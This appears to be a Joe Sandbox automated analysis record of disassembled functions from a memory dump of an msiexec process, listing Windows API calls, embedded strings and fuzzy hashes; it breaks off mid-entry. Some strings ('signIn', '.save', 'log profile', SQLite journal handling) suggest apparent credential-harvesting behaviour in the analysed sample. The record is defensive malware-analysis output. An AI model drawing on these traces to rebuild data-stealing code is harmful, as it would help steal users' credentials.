                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                      • API String ID: 2767993716-572158859
                                                                                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                      • String ID: ($d
                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                      • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                      • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                      APIs
                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3015003838-0
                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 59245283-0
                                                                                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                      • String ID: 3A
                                                                                                      • API String ID: 3300951397-293699754
                                                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                      • String ID: strings
                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                      • String ID: r!A
                                                                                                      • API String ID: 2791114272-628097481
                                                                                                      • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                      • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                      • String ID: BIN
                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                      • API String ID: 776488737-1622828088
                                                                                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: -journal$-wal
                                                                                                      • API String ID: 438689982-2894717839
                                                                                                      • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                      • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3975816621-0
                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313361498-0
                                                                                                      • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                      • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
